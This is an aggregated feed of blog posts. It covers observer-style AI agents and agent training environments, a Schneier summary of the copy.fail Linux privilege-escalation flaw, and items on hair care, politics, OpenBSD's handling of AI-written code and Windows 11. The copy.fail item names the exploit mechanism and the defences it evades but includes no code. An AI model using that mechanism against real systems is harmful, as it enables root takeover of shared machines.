  • Attention drift: where your time really went
  • Relationship decay: people you insist are key but haven’t contacted in months

Podhajský’s system does exactly this, using a read‑only agent that writes only into its own Obsidian vault—no edits to the original systems, no auto‑emails, just brutally honest reflections and suggested experiments.

Here’s the trap: Your agent must only observe. The moment an agent writes back into the systems it’s monitoring, you’ve poisoned the well. You’re not observing your behavior anymore; you’re observing an AI‑amplified feedback loop. You’ve built an observability rig that forges its own logs. The data stops being “you” and becomes “you plus a stochastic autocomplete with opinions.”

For personal AI, that’s existential. If the whole point is to help you see yourself more clearly, having the same system both author and interpret the traces destroys the value proposition. The mirror starts painting your reflection.

Feedback loops, not party tricks

Seen as feedback loops, the symmetry becomes obvious.

A mirror is a loop targeting your nervous system. The “model” being updated is the human. The exhaust is your digital activity. The environment is your toolchain. The reward shows up as shame, insight, or resolve when you see your week laid bare.

A gym is a loop targeting model weights. The model acts in a world, receives rewards or penalties, and updates its policy. The exhaust is trajectories of prompts, actions, outcomes. The environment is a task harness. The reward is a verifiable signal.

Two different learners, same structure:

  • In the mirror, the user is the learner and the agent is a silent observer.
  • In the gym, the model is the learner and the environment is the judge.

Both are broken for the same reason: We obsess over agents doing flashy things and neglect the quality of the signal that trains the system—human or model. We ship chatty butlers and call it “intelligence” instead of asking, “How clean is the feedback?”

Environments are the new unit of deployment

On the model side, we’re still trying to prompt‑engineer our way into reliability. That’s cute for prototypes but reckless for systems you depend on.

We spent 20 years perfecting CI/CD for deterministic code—version control, reproducible builds, test harnesses, staging, blue‑green deploys—all so we could ship with confidence. Meanwhile, we vibe‑check stochastic agents into production with a handful of prompts and a cherry‑picked demo.

A more sensible default is to treat the environment definition—the code and configuration that specify the world the model lives in—as the unit of deployment. Libraries like Verifiers make this concrete by packaging environments for LLMs with tools, datasets, parsing logic, rewards, and rollout policies in one place.

To make that definition precise, you need four anchors:

  • State schema: The shape of the world the environment exposes to the model at each step (fields, types, invariants)
  • Action interface: The tools or functions the model is allowed to call, with their inputs and outputs
  • Reward spec: The checks you run to score behavior (correct/incorrect, passed/failed, right tool, right schema)
  • Rollout policy: How you exercise the environment (single‑turn versus multi‑turn, maximum steps, termination conditions)

You’re not “deploying state” in the sense of a frozen snapshot of production. You’re deploying the rules of the game: what the model can see, what it can do, how you score it, and how you run episodes. Any candidate model you plug into that environment is evaluated and constrained the same way. You then treat that environment definition like a test suite plus staging cluster: comparing models on behavior that matters for your workflow, training smaller, specialized models using verifiable rewards instead of vibes, and detecting regressions when either models or tools change.

For enterprises, this means you don’t “deploy an LLM” with some prompts. You ship an environment package: code, config, and test data that define the world; plus metrics and logging. The model is a plug‑in you can swap or retrain based on how it behaves inside that package, not in an ad hoc prompt sandbox.
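To make “environment as the unit of deployment” concrete, it can help to picture the package as a small repository. The layout below is purely illustrative—every file name is made up—but it maps onto the four anchors above plus test data and regression suites:

```
env-claims-adjudication/        # hypothetical environment package
├── schema/state.json           # state schema: fields, types, invariants
├── tools/actions.yaml          # action interface: callable tools and their I/O
├── rewards/checks.py           # reward spec: pass/fail scoring of behavior
├── rollout.yaml                # rollout policy: turns, max steps, termination
├── data/sample-cases/          # sample data to exercise the workflow
└── tests/regression/           # suites rerun when models or tools change
```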

Observers, gyms, and asymmetric agents

Mirrors and gyms are both environments built around feedback loops. The difference is who’s allowed to touch reality.

  • Mirrors watch you. The AI reads broadly, writes only to its own notes, and hands you structured feedback. You learn; you act.
  • Gyms watch the model. The AI acts inside a sandbox, collects rewards, updates its weights. The model learns; the environment constrains.

Agents—the things that take actions in live systems—should sit downstream of both. They should be asymmetric by design:

  • In production, agents default to read‑only or read‑mostly. Write access is narrow, logged, reviewable, and easy to kill.
  • In training and evaluation, agents can be fully read‑write but only inside deliberately engineered environments.

Anything else is YOLO alignment: You train in production, corrupt your own telemetry, and then argue with the logs when something goes wrong.

Think of it as risk management for agents. Every new write permission expands the blast radius. If you haven’t instrumented the read path, you’re taking on unpriced risk. Gyms for them, mirrors for us, asymmetric agents at the edges—that’s a risk posture you can explain to an auditor.

Butler agents are security theater

Now add security to the mix. Simon Willison’s “lethal trifecta” of agent risk is simple: private data, untrusted inputs, and external communications. Get all three in one agent and you’ve basically handed an attacker a loaded gun.

Most “do‑everything” butler agents proudly hit the trifecta: They ingest piles of sensitive internal data, they cheerfully process whatever the internet throws at them, and they’re allowed to send emails, modify records, or call external APIs. You’ve built a hyper‑efficient exfiltration and amplification engine.

Observer AI pulls in the opposite direction. It can still see private data but uses it only to generate internal reflections or drafts. It treats untrusted inputs as something to analyze, not something to obey. And it doesn’t touch external channels; you stay in the loop.

Butler agents give executives the feeling that “AI is doing work for us” while dramatically increasing the blast radius of prompt injection, model hallucinations, or compromised keys. Observers are actual governance: They help humans see, reason, and decide before anything gets written where it counts.

In the enterprise, “agentic workflows” without observer environments are just shadow IT with better branding. If you can’t instrument and audit what the system reads, you have no business trusting what it writes.

Boots on the ground: The friction is real

This isn’t just a whiteboard problem. In big bank reality, the conversation often goes like this:

Client: “We want an AI assistant that updates customer records, sends follow‑ups, and opens tickets automatically.”

Me: “Great. Show me your observability. How do you know what it’s reading today and how those reads map to actions?”

Client: “…we have logs?”

Say, “No, your shiny new bot should not have direct write access to the CRM,” and the first reaction is disbelief. Then come the workarounds: “What if it drafts and auto‑sends unless someone clicks reject?” “What if it only updates ‘safe’ fields?” “What if the human is technically in the loop but the default is accept?” All of them duck the hard work of building the mirror and the gym first.

In a post‑GDPR, post‑breach world, an observer that doesn’t push data is a compliance gift. A write‑enabled agent is a data‑deletion nightmare and a discovery headache. We’re desperate to give agents hands before we’ve given ourselves eyes. Until you can trace the read path—what’s accessed, why, and with what downstream effect—every new write permission is architectural debt with a ticking clock.

A simple playbook

If you’re trying to bring order to this chaos, here’s a blunt playbook.

Build observers first
Aggregate your cognitive exhaust—or the org’s. Start with a read‑only layer across mail, tickets, docs, code, CRM, usage logs. Have it produce structured reflections: where work happens, where intent and action diverge, and where relationships or processes are decaying. Let it write only into its own vault.

Encode scary workflows as environments
Pick high‑risk, high‑value flows: claims adjudication, payment routing, change approval, remediation—anything with money, legal exposure, or brand risk. For each, define an environment with clear state schema, action interface, reward spec, and rollout policy. Use frameworks like Verifiers to make these reusable instead of bespoke scripts.

Treat environments as deployable artifacts
Think of an environment as a repo you can clone—not a frozen copy of production but the minimum code, configuration, and sample data needed to exercise a workflow reproducibly. You version, test, and promote that environment package the way you do services. When APIs, schemas, or policies change, you update the package and rerun the suites. You don’t “prompt harder” in production and hope.

Only then, grant narrow write access
Once mirrors and gyms are in place, start handing out tightly scoped write capabilities—one surface at a time, with metrics and rollback. And have your observers watching both human and agent behavior for drift. This is slower. It’s also professional.

Rethinking “personal” and “agentic”

Reframing AI around feedback loops does odd things to our buzzwords. “Personal AI” stops being “a bot that talks like you and acts for you” and becomes “an observability layer on your own cognition.” It’s closer to therapy than outsourcing. Therapy doesn’t send emails for you; it changes how you write them.

“Agentic AI” stops being “a thing that chains tools together” and becomes “a thing that lives inside an environment with explicit constraints and signed‑off rewards.” The swagger moves from the model to the environment. The question shifts from “How smart is your agent?” to “How well‑designed is the world you’re letting it inhabit?”

Gyms for them, mirrors for us. Agents only where the feedback loops are strong enough to justify the risk. Less demo‑friendly than a bot that spams your calendar, sure. But a lot closer to something you can live with—in your personal life, and in a production architecture that must survive contact with reality.

12:14

Copy.Fail Linux Vulnerability [Schneier on Security]

This is the worst Linux vulnerability in years.

TL;DR

  • copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC.
  • It abuses the kernel crypto API (AF_ALG sockets) plus splice() to write four bytes at a time straight into the page cache of a file the attacker does not own.
  • The exploit works unmodified across Ubuntu, RHEL, Debian, SUSE, Amazon Linux, Fedora and most others. No race condition, no per-distro offsets.
  • The file on disk is never modified. AIDE, Tripwire and checksum-based monitoring see nothing.
  • Kubernetes Pod Security Standards (Restricted) and the default RuntimeDefault seccomp profile do not block the syscall used. A custom seccomp profile is needed.
  • The mainline fix landed on 1 April. Distros are rolling kernels out now. Patch.

“Local privilege escalation” sounds dry, so let me unpack it. It means: an attacker who already has some way to run code on the machine, even as the most boring unprivileged user, can promote themselves to root. From there they can read every file, install backdoors, watch every process, and pivot to other systems.

Why does that matter on shared infrastructure? Because “local” covers a lot of ground in 2026: every container on a shared Kubernetes node, every tenant on a shared hosting box, every CI/CD job that runs untrusted pull-request code, every WSL2 instance on a Windows laptop, every containerised AI agent given shell access. They all share one Linux kernel with their neighbours. A kernel LPE collapses that boundary.

News article.

11:28

The Law of Unintended Consequences [Judith Proctor's Journal]

Those who love 'The Good Place' as much as I do will probably recognise the quote.

'The Law of Unintended Consequences' says that it's not possible to live a perfect life in modern society.  Everything we do impacts negatively on the environment or involves low-paid labour, unethical working practices, etc.

But there are some things we can do.

We can't win, but we can nibble at the edges.

Shampoo

Advertisers work hard to convince us that we need to wash our hair every single day to keep it perfect, but our ancestors didn't have shampoo.  Shampoo didn't reach the UK until the eighteenth century.

I used to suffer from regular problems with my ears.  I thought it was earwax build up, until the lady syringing my ears said it was thin slivers of skin.

I wondered what was triggering it, and considered that shampoo might be a possible cause.


Taking a deep breath, I began cutting out shampoo at a week long folk festival - where so many people were camping that no one would notice if I was looking a mess.

My hair got greasy, but not as badly as I'd expected.  I carried on with the experiment...

After two months of not stripping all the natural oils in my hair and scalp, my body stopped over-producing them in an effort to replace them.

Over 30 years later, I still haven't gone back to using shampoo, and my hair isn't greasy.  I wash it with water, and that's all.  Brushing distributes the oils evenly and keeps it silky, but not greasy.

Another member of my family who went the same way, briefly tried shampoo recently, and promptly got dandruff (which they'd never had before).

Not saying this will work for everyone, but you can save a LOT of money, and reduce your environmental impact as well (detergent kills fish).  If you do go for it, cut down gradually: reduce the amount of shampoo you use, and reduce the frequency of washes.  If you cut down gradually, then you'll avoid the greasy phase.  Maybe use some sort of tiny measuring cup to measure the amount you use?


10:28

Early rejections [Seth's Blog]

Long after the fact, these are the best kind. They remind us of how far we’ve come. They’re proof that not giving up was a good idea. They are fuel for the next thing.

But, at the time, they’re pretty hard to live with.

All we can do is remind ourselves that it’s an unskippable part of a useful journey.

08:28

Pluralistic: A fascist paradigm (12 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links



A king on a sumptuous, much elaborated throne; in one hand he holds a sceptre of office, in the other, the leashes for two fierce stone dogs that guard the throne. The king's head has been replaced with a character who was used as the basis for MAD Magazine's Alfred E Neumann. The new head sports a conical dunce cap. Behind the king is a UK Reform Party rosette. The background is an Egyptian temple, ganked from a Dore Old Testament engraving. The floor has been carpeted in sumptuous tabriz from the Ottoman court.

A fascist paradigm (permalink)

Yesterday, I attended a workshop on systems thinking and political change, which included a presentation on the work of Donella Meadows, whose Thinking in Systems is a canonical work on the subject:

https://en.wikipedia.org/wiki/Thinking_In_Systems:_A_Primer

"Systems thinking" is an analytical framework that treats the world as a mesh of interconnected, nonlinear components and relationships that can't be easily understood or steered. A complex system isn't merely "complicated." A mechanical watch is complicated, in that it has many parts that work together in ways that require training and specialized knowledge to understand. But it isn't "complex" because each part has a specific function that can be understood and adjusted.

In a complex system – say, an ecosystem – the parts are meshed in a web of unobvious relationships that make it difficult to predict what effect will follow from a given perturbation. When a blight kills off a plant species, the soil stability declines, resulting in landslides during the rainy season, changing the mineral content of nearby waterways, which creates microbial blooms or fish die-offs in a distant, downstream lake.

A slide showing a lever weighted down on one end by a circle labeled 'System' next to a fulcrum; the points along the lever are labeled with different potential interventions that can move the system, taken from the work of Donella Meadows.

But systems thinking isn't a counsel of despair that insists that you shouldn't do anything because you can never predict what will come of your actions. In Thinking in Systems, Meadows presents a hierarchy of leverage points for changing a system, ranked from least effective ("Constants, numbers, parameters") to most ("The power to shift paradigms to deal with new challenges"):

https://www.flickr.com/photos/doctorow/55264856861/

In all, Meadows theorizes 12 different "places to intervene in a system." The least effective of these – constants like taxes and standards, negative and positive feedback loops – are the sites of most of our political fights, and rightly so. They are the fine-tuning knobs of the system that adjust its margins. Once you have the rule of law ("the rules of the system"), you can drive change by amending, repealing or passing a law:

https://donellameadows.org/archives/leverage-points-places-to-intervene-in-a-system/

But when you're confronted with a system that is significantly, persistently dysfunctional, you will likely have to work at sites that are further up the hierarchy, such as "the distribution of power over the rules of the system" or "the goals of the system"; or the most profound of all, "the paradigm out of which the system — its goals, power structure, rules, its culture — arises."

Thinking about paradigms is a form of "meta-cognition," which is to say, "thinking about how you think." Your paradigm encompasses all your assumptions, including your assumptions about how to proceed from your other assumptions: "if x, then y" is a paradigm.

The workshop where we were discussing all of this is part of a group whose goal is reversing the antidemocratic movement in our society and the climate emergency that is its backdrop. But as I listened to the speaker and the ensuing discussion, it occurred to me that Meadows' theoretical work was a very good way of describing the successes of the fascist movement in the UK and around the world.

Fascists like Farage and Trump are, at their root, anti-democratic. Their pitch is that the people are incapable of self-determination (as Peter Thiel puts it, "democracy is incompatible with freedom"). They want us to think that all our neighbors are irrational and foolish, and that we, too, are irrational and foolish, and that our safety and prosperity can only be safeguarded if we seek out those few people who are born to rule and liberate them from the petty niceties and regulations that democracy and the rule of law demand.

In other words, the paradigm of democracy is that all of us are capable of both wise self-governance and self-rationalized misgovernance, and each of us has a useful perspective to contribute. The fascist paradigm is that we can't be trusted to rule ourselves, and only the people who are born with "good blood" are capable of directing our lives:

https://pluralistic.net/2025/05/20/big-cornflakes-energy/#caliper-pilled

This is the theory behind "race realism" and "human diversity" and all the other polite names the modern fascist uses to obscure the fact that they're reviving eugenics. It explains the panic over DEI, a panic driven by the belief that lesser people are being elevated to positions of rule and authority that they are genetically incapable of carrying out.

That's why, whenever a disaster arises, fascists demand to know the gender, race and sexual orientation of the pilot, the ship's captain, or the official in charge. If the person who crashed the cargo ship into the bridge has brown skin, we can add another line to the ledger of costs associated with the doomed project to put people who were born to be bossed around in the boss's seat (of course, if the pilot turns out to be a white guy, that proves nothing, except that mistakes sometimes happen).

The revival of fascism in this century has been scarily effective, and at times it can feel unstoppable. Meadows' work on systems thinking provides an explanation for that efficacy – and suggests a theory of change for dispatching fascism back to the graveyard of history. Fascists have made changes to things like laws and feedback loops, rules and distribution of power, but this all stems from a more profound alteration to the system, at the level of the paradigm.

Which suggests that the real fight we have is over that paradigm: we have to convince our neighbors that they are smart enough to rule themselves, and so are we, and so is everyone else. We have to convince them that even the smartest and wisest person (including us, including them) is capable of folly and needs to have checks on their (our) authority.

We need to attack the theory of the "unitary executive" and every other autocratic ideology head on. We have to insist that these aren't just unconstitutional, but that they are ideologically catastrophic. "No kings," because even an omnibenevolent king isn't omniscient, and that means that omnipotence is always omnidestructive in the long run.

The fascist revival has been scarily effective and resilient – and systems thinking offers an explanation for both that efficacy and that resiliency.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago First aid for the dying dotcom http://modernhumorist.com/mh/0010/dotcom/

#20yrsago OpenStreetMap maps Isle of Wight, Manchester next https://wiki.openstreetmap.org/wiki/Mapchester_Mapping_Party_2006

#20yrsago Fueling model rockets with Oreo fillings https://web.archive.org/web/20060616192646/https://www.popsci.com/popsci/how20/600152d7d441b010vgnvcm1000004eecbccdrcrd.html

#20yrsago Legal guide for podcasters https://wiki.creativecommons.org/wiki/Welcome_To_The_Podcasting_Legal_Guide

#20yrsago Collection of 1100+ found grocery lists https://grocerylists.org/

#10yrsago Mayor of Jackson, MS: “I believe we can pray potholes away” https://www.wjtv.com/news/jackson-mayor-tony-yarber-we-can-pray-potholes-away/

#10yrsago What’s the best way to distribute numbers on the faces of a D120? https://web.archive.org/web/20160510182023/https://www.wired.com/2016/05/mathematical-challenge-of-designing-the-worlds-most-complex-120-sided-dice/

#10yrsago Billionaire Paypal co-founder Peter Thiel will be a California Trump delegate https://web.archive.org/web/20160510155226/https://www.wired.com/2016/05/investor-peter-thiel-will-california-delegate-trump/

#10yrsago McClatchy newspapers’ CEO pleased to announce that he’s shipping IT jobs overseas https://web.archive.org/web/20160510102956/https://www.computerworld.com/article/3067304/it-careers/newspaper-chain-sending-it-jobs-overseas.html

#10yrsago Peace in Our Time: how publishers, libraries and writers could work together https://locusmag.com/feature/cory-doctorow-peace-in-our-time/

#10yrsago Too Like the Lightning: intricate worldbuilding, brilliant speculation, gripping storytelling https://memex.craphound.com/2016/05/10/too-like-the-lightning-intricate-worldbuilding-brilliant-speculation-gripping-storytelling/

#5yrsago LA traveling toward free public transit https://pluralistic.net/2021/05/10/comrade-ustr/#get-on-the-bus

#5yrsago Biden's shift on vaccine patents is a Big Deal https://pluralistic.net/2021/05/10/comrade-ustr/#vaccine-diplomacy


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Staehle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), FirstSecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

08:14

Kept In The Dark by Ari Ganahl [Oh Joy Sex Toy]

Kept In The Dark by Ari Ganahl

Put on your white noise headphones and dim the lights; today’s comic is all about Sensory Deprivation. Ari Ganahl steps up and quietly shows us how with today’s lovely comic. Meditative sexy deprivation… Thank you so much Ari! Bluesky Tumblr Portfolio Oh heck, June is ALMOST here; Pledge Drive Month! The month we try to […]

06:28

Richard will give a talk in Erlangen, Germany [Richard Stallman's Political Notes]

Richard Stallman will speak in Erlangen, Germany on June 16 at 16:00, at the School of Engineering of FAU.

The talk is on the moral issues of free vs nonfree software.

We suggest you bring cash.

02:35

Evolution of a Jackalogo [Nina Paley]

My dream-bike-in-progress, the Jackalope, will have a logo etched (“bead blasted”) into the titanium, on each side of the frame. I have been working on said logo for over a week. Here’s the latest iteration:

Jackalope facing Left

That is iteration #19. Here’s how it started:

First draft

And here are some iterations between 1 and 19:

Second draft
Made the antlers look like bike handlebars!
Text inside the animal
Integrating inside text with animal curves
More text/curve integration. Now it looks kinda like a digestive tract. Bug or feature??
Warped the text to follow the body curve of the Jackalope
Made a left-facing version because logo needs both right- and left-facing
Some preferred the text below, so I pivoted to simplifying the animal.
Simplified animal outline with text inside
Should the Jackalope have pointy feet?… This one has a pointy front foot and more rounded back foot
Stylized rounded front foot on this one. Dead end.
I decided I preferred the pre-simplified outline, but thought the cursive text might be insufficiently legible, so tried it with a more legible font.
Subtle adjustment on back legs, so the “e” doesn’t touch the leg gap
Nope, I preferred the cursive. Here’s #19 again. I rounded the letters a bit, and connected them like real cursive. I separated the ears and adjusted the handlebars/antlers. I made a few subtle curve adjustments to integrate the letters.
Latest Jackalope logo facing Right. Some people don’t like the “J” going out its butt, but you can’t please everyone!


The post Evolution of a Jackalogo appeared first on Nina Paley.

01:14

Raising the Roof [Whatever]

In the further adventures of home renovation, the back deck has been laid and now the roofing is being put up, for shade and to keep rain off the deck. It’s looking.. pretty good! There’s more to be done, obviously. But it’s coming along nicely.

— JS

00:49

In Bloom [Penny Arcade]

For the benefit of Arcadians new and old, gay and… I guess… not a hundred percent gay, somewhat less gay at any rate, our revels in Penny Arcade's ancient past continue apace. Time has passed everywhere, even inside Mork's purty pitchers he duz all them scratchin's on. I was startled by his suggestion for this strip and I suspect others may be also.

00:28

OpenBSD and slopcode: raindrop to a torrent? [OSnews]

Every single software product is dealing with the question of what to do with “AI”-generated code, but the question is particularly difficult to answer for open source operating systems like Linux distributions and the various BSDs, which often consist of a wide variety of software packages from hundreds to thousands of different developers. On top of that, they also have to ask the “AI” question for every layer of their offering, from the base install, to the official repositories, to community-run ones.

As users, we, too, are asking these same questions, wondering just how much “AI” taint we’re willing to spread across our computers. I understand the difficult position Linux distributions are in with regard to “AI”. I mean, when even the Linux kernel itself is tainted by “AI”, a no-“AI” policy is basically an empty gesture for them at this point. Personally, I find a policy of “we don’t do ‘AI’ in our work, but we don’t have control over the thousands of components we consist of” to be an entirely reasonable, if deeply unsatisfying, position to take. What else are they going to do? You can’t really be a Linux distribution without, you know, the Linux kernel, which is, as I’ve already said, utterly tainted by “AI” at this point.

Still, in the back of my mind, I always had a trump card: if all else fails, we’ll always have OpenBSD. Its project leader Theo de Raadt is deeply principled, every OpenBSD user and contributor I know hates “AI” deeply, and the project routinely sticks to its principles even when it’s difficult or inconvenient. Yes, this makes OpenBSD not the most ideal desktop operating system, but I’d rather use that than something that completely ignores the multitude of ethical, environmental, quality, and legal concerns regarding “AI” code.

Imagine my surprise, then, to discover that OpenBSD already contains slopcode in its base installation, with the project’s leaders and developers remaining oddly silent about it. My friend and OSNews regular Morgan posted this on Fedi a few days ago:

Nearly six weeks later, and the question of whether “AI” generated code in tmux — not tool-assisted bug finding, not refactoring, actual LLM-generated slop with questionable license(1) — that was consequently merged into OpenBSD base, is considered acceptable by the lead devs, remains unanswered. Despite Theo de Raadt’s concrete stance against any code of questionable license origin polluting the project — and the tmux merge was indeed questionable — it seems this is being swept under the rug. This makes me extremely uncomfortable; it’s like seeing a fox in the henhouse but the farmers are all looking the other way and no one can convince them to admit they can see it and root it out.

I really don’t know what to do being just a user; I feel like even if I tried to chime in on the mailing list I would just be ignored like the others trying to raise the alarm. I hope, as they do, that this is being discussed internally, away from the public list, and that a positive outcome is near. Maybe they are waiting for the 7.9 release before setting anything in stone.

Or maybe the “AI” disease has infected one of the last pure operating system projects we have left and there’s no going back.

↫ Morgan on Fedi

I obviously share Morgan’s concerns, and like him, I’m also afraid that opening the door to a few drops of slop in base will quickly grow into a torrent of slop as time goes by. Yes, it’s just a patch to tmux, but it’s in base, and the “base” of a BSD is almost a sacred concept, and entirely the last place where you want to see code that raises ethical, environmental, quality, and legal concerns. For all we know, this patch of slop or the next one contains a bunch of GPL code because it just so happens that’s where the ball tumbling down the developer’s pachinko machine ended up.

GPL code that would then be in the base of a BSD.

I echo the call for the OpenBSD project to address this problem, and to set clear boundaries and guidelines regarding “AI” code, so users and developers alike know what level of quality and integrity we can expect from OpenBSD and its base installation going forward.

00:21

Urgent: Block attempt to ban voting by mail [Richard Stallman's Political Notes]

US citizens: call on Congress to block the fascist's attempt to ban voting by mail.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Reject budget that attacks public education [Richard Stallman's Political Notes]

US citizens: Tell Congress to reject the magats' budget that attacks public education.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Household cost of blockaded oil and gas [Richard Stallman's Political Notes]

Citing the household cost of blockaded oil and gas to remind people of the desperate need to start climate defense.

The article uses the fashionable term "toxic", saying that the topic of climate disaster and the need to prevent it has become "toxic". What does that actually mean? Why in general does a topic, cause, or person, become "toxic"?

It is usually the result of a systematic campaign of vilification which aims to associate the target with a vague criticism, for which the reasons are rarely rationally reconsidered. In the case of climate defense, we know this campaign has been operating for years, funded by the fossil fuel companies and spread by the many businesses that have relations with them and the politicians that they have funded.

The word "toxic", at the concrete level, refers to the existence of such an association for that target. But its connotation puts the blame on the target. Thus, it is a weasel-word whose effect is to endorse the campaign -- in effect, to condemn climate defense for being the target of vilification by the rich.

I therefore suggest rejecting the word.

World unprepared for next pandemic [Richard Stallman's Political Notes]

*World "unprepared" for next pandemic as countries fail to agree on sharing information, tests and vaccines.*

Magat officials closed San Francisco's immigration court [Richard Stallman's Political Notes]

Magat officials have closed San Francisco's immigration court.

US immigration courts have been underfunded for years, producing a large backlog of immigration cases. The wrecker's policy is to seize on various bogus excuses (such as criticizing him for his actions and policies) to cancel people's immigration cases. As a result, delaying the resolution of those cases is advantageous for him.

Rate of side effects from Covid and Shingles vaccines [Richard Stallman's Political Notes]

US Food and Drug Administration scientists published papers on the rate of side effects from Covid and Shingles vaccines, and found that serious side effects were very rare — one in a million.

Anti-vax agency officials withdrew the papers, claiming that the conclusions are invalid.

Banned non-fiction books doubled in US [Richard Stallman's Political Notes]

*Report shows banned non-fiction books doubled over last school year in US. New PEN America report analyzed 3,743 unique titles removed from libraries and classrooms and found books about activism and social movements were targeted.*

Mexico city sinking up to 40cm per year [Richard Stallman's Political Notes]

Mexico city is pumping so much water out of the aquifer underneath it that it is sinking up to 40cm per year.

When pipes leak under Mexico City, where does the water go? Into the aquifer? If so, leakage is just a way of extracting less. But I can't be sure of that — the leaked water may take years to reach the aquifer, rather than going where it is needed. And engineers would compensate by increasing the extraction rate.

With enough money, solar-powered desalination could provide water for Mexico City, and pipelines could bring it there. But this would require taxing the rich.

Australian PISSI wives returning to Australia [Richard Stallman's Political Notes]

Australia has allowed some Australians who became PISSI wives, and were imprisoned for years in Syria, to return to Australia.

Some of them face grave criminal charges for supporting PISSI, and they deserve that. But exiling people is an unjust punishment for any crime, and punishing them without a trial is unjust too.

Radical listening [Richard Stallman's Political Notes]

Radical listening — a way of drawing passersby into exploring political issues together.

China trying to eradicate Tibetan culture [Richard Stallman's Political Notes]

China is trying to eradicate Tibetan culture and language by teaching children to speak only Chinese.

This reminds me of the residential schools that the US and Canada forced Amerindian children to live in during much of the 20th century — likewise designed to erase their cultures and languages.

The US and Canada ceased that practice some decades ago; now China is taking it up.

Political issues worth writing about [Richard Stallman's Political Notes]

Ralph Nader describes several political issues that would be worth writing about, but reporters disregard his requests that they do so.

With regard to trying yet again to remove the monster from office, we know that it can't be done with the current composition of Congress. He was impeached twice during his first term, the second time after the January 6 attack on the Capitol, and Senate Republicans protected him both times. They would surely do it again; their attachment to him takes precedence over their country.

Besides, he now has another monster, less deranged but no less cruel and un-American, standing by to replace him.

However, as Nader suggests, the attempt might be an effective basis for organizing to save the Constitution by defeating SCROTUS in November. And our ex-presidents do have a duty to help.

Customers blocked from donating to the SPLC [Richard Stallman's Political Notes]

Big financial companies such as Fidelity and Vanguard have arbitrarily blocked customers from donating to the SPLC from their donor-advised funds.

I wonder if they can move these funds to other companies that aren't lackeys of persecution.

Punishing network for political reasons [Richard Stallman's Political Notes]

*ABC lawyers accuse [the] FCC [in court] of punishing network for political reasons.*

It is not news that the FCC is doing that, but ABC's willingness to resist is rare and admirable.

Directions for US and Iran negotiations [Richard Stallman's Political Notes]

Proposing directions for negotiation between the US and Iran that might lead to a deal.

It seems that the biggest obstacle is how to assure Iran that the US will actually keep a deal. Remove the bullshitter from office, perhaps?

Monday, 11 May

23:42

Page 12 [Flipside]

Page 12 is done.

22:56

Windows 11 will start boosting your processor to maximum GHz to make the Start menu open faster [OSnews]

Microsoft is currently testing a brand new performance-enhancing feature in Windows 11.

Microsoft, too, is introducing something to Windows 11 called “low latency profile”, and this will work irrespective of the processor, be it AMD64 CPUs from Intel or AMD, or ARM64 ones from Qualcomm. Essentially what this new tech will do is apply a maximum available clock frequency boost for a very small span of time, like one to three seconds, when a user launches any app. The idea is that the app launch time will be reduced, while the quick clock burst should not impact the overall efficiency of the system by much.

↫ Sayan Sen at Neowin

Unsurprisingly, boosting the processor’s clock speed to its maximum for a few seconds will make a menu or application open a little faster. I’m not entirely sure why anyone seems surprised by this, but here we are. Yes, the Start menu will load faster and applications will be ready quicker if you boost the processor to its full potential, but that does raise the question of why Windows 11 would need to do that just to open a menu or load an application in the first place.

According to Microsoft’s Scott Hanselman, who defended Microsoft’s approach (weirdly enough he did so on a nazi platform called “Twitter” that I’m obviously not linking to), every other modern operating system does the exact same thing, pointing specifically to macOS and GNOME and KDE on Linux. He also pointed out that the Start menu today does a lot more than the same Start menu back in Windows 95, including making network requests and rendering everything in HiDPI.

